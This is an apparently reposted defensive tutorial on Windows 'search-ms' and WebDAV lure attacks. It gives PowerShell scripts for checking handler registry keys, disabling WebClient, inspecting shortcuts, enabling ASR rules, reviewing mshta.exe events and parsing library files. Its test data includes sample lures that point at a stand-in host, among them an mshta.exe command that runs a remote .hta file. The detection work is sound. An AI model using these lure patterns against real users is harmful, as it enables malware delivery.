
Introduction
The ‘search-ms’ URI protocol handler in Windows remains a potent attack vector, as highlighted in the June 2025 HP Threat Insights Report. A `search-ms:` link opens an Explorer search window, and its `crumb=location:` parameter tells Explorer where to look, which can be a remote WebDAV share. Attackers exploit this by crafting lures (links or library definitions) that point at a share they control, so the search results pane shows their payload as if it were a local file; the user sees a familiar Explorer window and double-clicks a shortcut disguised as a benign document. No vulnerability is involved, the feature works as designed, which is why understanding protocol handler abuse and layering defensive measures matters.
Learning Objectives
- Understand how attackers abuse the ‘search-ms’ protocol to deliver malware.
- Learn defensive techniques to mitigate such attacks.
- Explore command-line tools to detect and analyze malicious URI handlers.
1. Detecting a Hijacked ‘search-ms’ URI Handler
Command:
Get-ItemProperty -Path "HKLM:\SOFTWARE\Classes\search-ms\shell\open\command" | Select-Object "(Default)"
Step-by-Step Guide:
This PowerShell command reads the machine-wide handler registered for the ‘search-ms’ protocol. On a standard install the value launches `explorer.exe`; if it points to anything else (e.g., `mshta.exe` loading remote HTML, or another script host), the handler itself has been hijacked. Note that the campaign described in the HP report does not hijack the handler: it abuses the legitimate `explorer.exe` handler, so a clean value here does not mean the machine is protected against the lure.
1. Open PowerShell as Administrator.
2. Run the command above.
3. Verify the output points to a legitimate Windows binary (e.g., `explorer.exe`).
4. Repeat for `HKCU:\Software\Classes\search-ms\shell\open\command`: per-user class registrations take precedence over HKLM in the merged HKCR view, so a hijack planted without admin rights only shows up there.
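An added example (not code from the HP report or the original post) that goes a step beyond the registry check: it decodes a `search-ms:` URI the way you would triage one from a phishing link, extracts every `crumb=location:` target and flags remote ones, then reads the registered handler from both class hives. The sample URI is constructed for illustration; `203.0.113.10` is a documentation address, not an indicator from any campaign.

```powershell
# Added example, not code from the HP report or the original post.
# Decodes search-ms: URIs (as found in phishing links, HTML lures or .url files),
# pulls out the crumb=location: targets and flags remote ones; then reads the
# registered handler from both class hives.

function Get-SearchMsLocation {
    param([Parameter(Mandatory)][string]$Uri)

    if ($Uri -notmatch '^search-ms:') { throw "Not a search-ms URI: $Uri" }

    # Everything after the scheme is an '&'-separated list of key=value pairs.
    $params    = @{}
    $locations = [System.Collections.Generic.List[string]]::new()
    foreach ($pair in $Uri.Substring('search-ms:'.Length) -split '&') {
        if ($pair -notmatch '^([^=]+)=(.*)$') { continue }
        $key   = $Matches[1]
        $value = [uri]::UnescapeDataString($Matches[2])
        $params[$key] = $value
        # A lure can carry several crumbs; only location: ones name a folder.
        if ($key -eq 'crumb' -and $value -match '^location:(.*)$') {
            $locations.Add($Matches[1])
        }
    }

    # UNC paths with an @port or @SSL suffix are the WebDAV form Explorer hands
    # to the WebClient service; plain http(s) URLs are also remote.
    $remote = @($locations | Where-Object { $_ -match '^(\\\\|https?://)' })

    [pscustomobject]@{
        DisplayName = $params['displayname']   # title of the Explorer window
        Query       = $params['query']         # search term shown in the box
        Locations   = @($locations)
        Remote      = $remote
        IsRemote    = $remote.Count -gt 0
    }
}

function Get-SearchMsHandler {
    # HKCU\Software\Classes overrides HKLM\Software\Classes in the merged HKCR
    # view, so a per-user hijack is invisible to an HKLM-only check.
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\Software\Classes\search-ms\shell\open\command"
        $cmd = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'(default)'
        [pscustomobject]@{
            Hive       = $hive
            Command    = $cmd
            # A default install hands search-ms: to explorer.exe; anything else
            # (mshta, wscript, powershell, a path under %TEMP%) is a hijack.
            Suspicious = ($null -ne $cmd) -and ($cmd -notmatch 'explorer\.exe')
        }
    }
}

# Constructed sample lure (documentation address, not a real indicator).
$sample = 'search-ms:query=Invoice%202025&crumb=location:\\203.0.113.10@80\DavWWWRoot\Documents&displayname=Downloads'
Get-SearchMsLocation -Uri $sample | Format-List

Get-SearchMsHandler | Format-Table -AutoSize
```

The sample's crumb names a WebDAV UNC path (`\\host@80\...` is the syntax the WebClient service understands), so `IsRemote` is set; a `displayname` of "Downloads" is exactly the trick the lure relies on, since the window title is attacker-controlled. `Get-SearchMsHandler` reports a missing HKCU key as `Command` `$null` and `Suspicious` `False`, which is the normal state.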
2. Restricting WebDAV (the WebClient Service)
Command:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WebClient\Parameters" -Name "BasicAuthLevel" -Value 0
Step-by-Step Guide:
The WebClient service is what lets Explorer treat a remote WebDAV share as a folder, so it is the component the search-ms lure depends on. The command above only forbids Basic authentication over WebDAV (`BasicAuthLevel` 0 = Basic disabled, 1 = Basic over SSL only, 2 = Basic allowed everywhere). That protects credentials on the wire, but it does not stop Explorer from browsing an attacker's share, which in these lures typically allows anonymous access. To close the delivery path, disable the service itself.
1. Open PowerShell as Administrator.
2. Run the command above to disable Basic authentication for WebDAV.
3. Stop and disable the service so Explorer can no longer mount remote WebDAV shares:
Stop-Service WebClient -Force
Set-Service WebClient -StartupType Disabled
4. Test against legitimate workflows first: SharePoint "Open with Explorer" and WebDAV-mapped drives stop working once WebClient is disabled. On domain-joined fleets, set the startup type through the Group Policy "System Services" node rather than host by host.
3. Analyzing Suspicious Shortcut (.lnk) Files
Command:
Get-ChildItem -Path 'C:\Users\*\Downloads\*.lnk' -Force -ErrorAction SilentlyContinue | ForEach-Object { $lnk = (New-Object -ComObject WScript.Shell).CreateShortcut($_.FullName); [pscustomobject]@{ FullName = $_.FullName; TargetPath = $lnk.TargetPath; Arguments = $lnk.Arguments } }
Step-by-Step Guide:
This command lists the `.lnk` files in every user's Downloads folder together with the target and arguments each shortcut launches. `Get-ChildItem` on its own only returns file metadata; a shortcut's target is stored inside the `.lnk` and has to be read through the `WScript.Shell` COM object. Check `Arguments` as well as `TargetPath`: in these lures the target is usually an innocuous system binary (`mshta.exe`, `cmd.exe`, `powershell.exe`) and the remote payload URL or WebDAV path is carried in the arguments.
1. Open PowerShell.
2. Execute the command to enumerate shortcuts and what they launch.
3. Investigate any `.lnk` whose target or arguments reference `mshta.exe`, a URL, or a UNC/WebDAV path such as `\\host@80\...`.
4. Blocking Script Payloads Launched via ‘mshta.exe’
Command:
Add-MpPreference -AttackSurfaceReductionRules_Ids "5BEB7EFE-FD9A-4556-801D-275E5FFC04CC" -AttackSurfaceReductionRules_Actions Enabled
Step-by-Step Guide:
Microsoft Defender’s Attack Surface Reduction (ASR) rules can stop the script content that `mshta.exe` is used to run. The rule ID above is "Block execution of potentially obfuscated scripts", which applies to script content regardless of which host runs it; the companion rule "Block JavaScript or VBScript from launching downloaded executable content" (`D3E037E1-3EB8-44C8-A917-57927947596D`) covers the next stage, when the script tries to run what it fetched. Neither rule blocks `mshta.exe` itself: to block the binary outright, use an AppLocker or WDAC policy (Microsoft's recommended block rules already list `mshta.exe`). Use `Add-MpPreference` rather than `Set-MpPreference`: `Set-` replaces the whole rule list and silently drops rules configured earlier. ASR rules only take effect when Defender is the active antivirus with real-time protection on.
1. Open PowerShell as Administrator.
2. Enable the rule in audit mode first (`-AttackSurfaceReductionRules_Actions AuditMode`), review Defender event ID 1122 (ASR audit) for false positives, then switch to `Enabled` (blocks are logged as event ID 1121).
3. Test with a benign HTA file to confirm legitimate scripts still run.
5. Monitoring Process Creation for ‘mshta.exe’
Command:
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -match '\\mshta\.exe' } | Format-List TimeCreated, Message
Step-by-Step Guide:
This command audits process creation events (ID 4688) for `mshta.exe`, a common payload delivery tool. A `Data='mshta.exe'` entry in the filter hashtable would not work: `Data` matches whole event data values, and `NewProcessName` is a full path such as `C:\Windows\System32\mshta.exe`, so the filtering is done on the message text instead (which also catches the `SysWOW64` copy).
1. Ensure "Audit Process Creation" (Advanced Audit Policy, Detailed Tracking) is enabled in Group Policy, together with "Include command line in process creation events" (Administrative Templates > System > Audit Process Creation); without the latter, 4688 records the binary but not the URL it was given.
2. Run the command to review `mshta.exe` executions; pay attention to the parent process (`explorer.exe` means a user double-clicked something) and to any URL or UNC path in the command line.
3. Correlate with network logs for external connections, especially outbound WebDAV (HTTP/HTTPS from the `svchost.exe` instance hosting WebClient) to the host named in the command line.
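An added example (not code from the HP report or the original post) that takes the 4688 review further: it converts `Get-WinEvent` records into objects with the fields that matter, then scores `mshta.exe` launches on the traits of this lure (remote payload on the command line, started from Explorer). The sample records at the bottom are constructed so the triage logic runs offline; `203.0.113.10` is a documentation address, not an indicator from any campaign.

```powershell
# Added example, not code from the HP report or the original post.
# Turns Security 4688 records into objects and flags mshta.exe launches that
# look like a search-ms/WebDAV lure: remote payload on the command line,
# started from Explorer (a double-click) rather than by an installer or agent.

function ConvertFrom-ProcessCreationEvent {
    # Input: System.Diagnostics.Eventing.Reader.EventLogRecord from Get-WinEvent.
    param([Parameter(Mandatory, ValueFromPipeline)]$Event)
    process {
        $xml  = [xml]$Event.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            TimeCreated       = $Event.TimeCreated
            User              = $data['SubjectUserName']
            NewProcessName    = $data['NewProcessName']
            CommandLine       = $data['CommandLine']   # empty unless command-line auditing is on
            ParentProcessName = $data['ParentProcessName']
        }
    }
}

function Test-MshtaLure {
    param([Parameter(Mandatory, ValueFromPipeline)]$Proc)
    process {
        if ($Proc.NewProcessName -notmatch '\\mshta\.exe$') { return }
        $reasons = @()
        # http(s) URL, or a UNC path in the WebDAV form \\host@80\ or \\host@SSL\
        if ($Proc.CommandLine -match 'https?://|\\\\[^\\\s]+@(ssl|\d+)') {
            $reasons += 'remote payload in command line'
        }
        if ($Proc.ParentProcessName -match '\\explorer\.exe$') {
            $reasons += 'launched from Explorer (user double-click)'
        }
        if ([string]::IsNullOrEmpty($Proc.CommandLine)) {
            $reasons += 'command line not audited; enable it to see the payload URL'
        }
        if ($reasons.Count -gt 0) {
            $Proc | Add-Member -NotePropertyName Reasons -NotePropertyValue ($reasons -join '; ') -PassThru
        }
    }
}

# Live use: read recent 4688 events from the Security log (needs admin).
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} -MaxEvents 5000 |
#     ConvertFrom-ProcessCreationEvent | Test-MshtaLure | Format-List

# Constructed sample records in the shape ConvertFrom-ProcessCreationEvent
# produces, so the triage logic can be exercised offline.
$samples = @(
    [pscustomobject]@{
        TimeCreated = Get-Date; User = 'alice'
        NewProcessName = 'C:\Windows\System32\mshta.exe'
        CommandLine = '"C:\Windows\System32\mshta.exe" \\203.0.113.10@80\DavWWWRoot\Invoice.hta'
        ParentProcessName = 'C:\Windows\explorer.exe'
    },
    [pscustomobject]@{
        TimeCreated = Get-Date; User = 'SYSTEM'
        NewProcessName = 'C:\Windows\System32\mshta.exe'
        CommandLine = 'mshta.exe C:\ProgramData\Vendor\setup.hta'
        ParentProcessName = 'C:\ProgramData\Vendor\agent.exe'
    },
    [pscustomobject]@{
        TimeCreated = Get-Date; User = 'bob'
        NewProcessName = 'C:\Windows\System32\notepad.exe'
        CommandLine = 'notepad.exe'
        ParentProcessName = 'C:\Windows\explorer.exe'
    }
)
$samples | Test-MshtaLure | Format-List
```

Only the first sample is reported (remote WebDAV path plus Explorer parent); the vendor agent running a local HTA produces no reasons and is dropped, and non-mshta processes are ignored. The "command line not audited" reason exists so that a fleet without command-line auditing still surfaces every `mshta.exe` launch instead of silently passing it, which is the failure mode of filtering on the URL alone.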
6. Hardening Windows Libraries
Command:
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Library" /v "DisableShellLibrarySave" /t REG_DWORD /d 1 /f
Step-by-Step Guide:
Windows libraries are `.library-ms` XML files (kept under `%APPDATA%\Microsoft\Windows\Libraries` for each user) whose `<url>` entries name the folders they aggregate, and a remote WebDAV share is a legal entry. Disabling library save functionality stops new library definitions from being written through the shell, which removes one way for an attacker to persist a malicious library; it does not stop a user from opening a `.library-ms` file that arrived by e-mail or download, so pair it with the WebClient restriction in section 2.
1. Open Command Prompt as Administrator.
2. Execute the command to disable library saves.
3. Restart the machine for the change to take effect, and confirm on a test image that the policy behaves as expected on your Windows build before deploying it fleet-wide.
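An added example (not code from the HP report or the original post) that complements the policy above with detection: it parses `.library-ms` definitions, lists every location each library aggregates, and flags remote ones, then scans the current user's registered libraries and common drop folders. The sample library is constructed; `203.0.113.10` is a documentation address, not an indicator from any campaign.

```powershell
# Added example, not code from the HP report or the original post.
# Parses Windows library definitions (.library-ms, an XML format) and reports
# every folder location they aggregate, flagging remote ones. Explorer renders
# a library's contents in a normal-looking window, so a library whose <url>
# points at an attacker's WebDAV share shows the payload as if it were local.

function Get-LibraryLocation {
    param(
        [Parameter(Mandatory)][xml]$Library,   # parsed .library-ms content
        [string]$Path = '<inline>'             # where it came from, for reporting
    )
    # PowerShell's XML adapter ignores the default namespace
    # (http://schemas.microsoft.com/windows/2009/library) for dotted access.
    $connectors = $Library.libraryDescription.searchConnectorDescriptionList.searchConnectorDescription
    foreach ($scd in $connectors) {
        $url = [string]$scd.simpleLocation.url
        [pscustomobject]@{
            Library       = $Path
            Url           = $url
            # Benign entries are knownfolder:{GUID} or a local path; a UNC path
            # (including the \\host@80\ WebDAV form) or an http(s) URL is remote.
            Remote        = [bool]($url -match '^(\\\\|https?://)')
            IsDefaultSave = ($scd.isDefaultSaveLocation -eq 'true')
        }
    }
}

function Find-RemoteLibrary {
    # Scans the current user's registered libraries plus common drop folders.
    $paths = @(
        "$env:APPDATA\Microsoft\Windows\Libraries\*.library-ms",
        "$env:USERPROFILE\Downloads\*.library-ms",
        "$env:TEMP\*.library-ms"
    )
    foreach ($file in Get-ChildItem -Path $paths -Force -ErrorAction SilentlyContinue) {
        try {
            Get-LibraryLocation -Library ([xml](Get-Content -LiteralPath $file.FullName -Raw)) -Path $file.FullName |
                Where-Object Remote
        } catch {
            Write-Warning "Could not parse $($file.FullName): $_"
        }
    }
}

# Constructed sample: a Documents-style library with one benign known folder
# and one attacker-controlled WebDAV share (documentation address, not a real IOC).
$sample = [xml]@'
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <isDefaultSaveLocation>false</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\203.0.113.10@80\DavWWWRoot\Documents</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
'@
Get-LibraryLocation -Library $sample -Path 'sample.library-ms' | Format-Table -AutoSize

# Live scan of this user's profile:
Find-RemoteLibrary | Format-Table -AutoSize
```

In the sample the `knownfolder:` entry (the user's Documents folder) comes back with `Remote` false and the WebDAV entry with `Remote` true. Run `Find-RemoteLibrary` under the user's own account, not an elevated one, because `%APPDATA%` then resolves to the profile whose libraries Explorer actually shows.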
What Undercode Say
- Key Takeaway 1: Attackers continue to exploit Windows protocol handlers due to their trusted nature and lack of user awareness.
- Key Takeaway 2: Defensive measures like ASR rules, WebDAV restrictions, and library hardening can significantly reduce risk.
Analysis:
The persistence of ‘search-ms’ abuse highlights the need for layered security. While Microsoft has introduced mitigations, organizations must proactively monitor and restrict protocol handlers. Future attacks may leverage similar techniques against cloud-based URI handlers, necessitating cross-platform defenses.
Prediction
By 2026, expect attackers to shift focus to cloud storage URI handlers (e.g., `onedrive://` or `sharepoint://`) as organizations disable legacy protocols like WebDAV. Continuous user education and endpoint detection tools will remain critical.
Reported By: Stephan Berger – Hackers Feeds


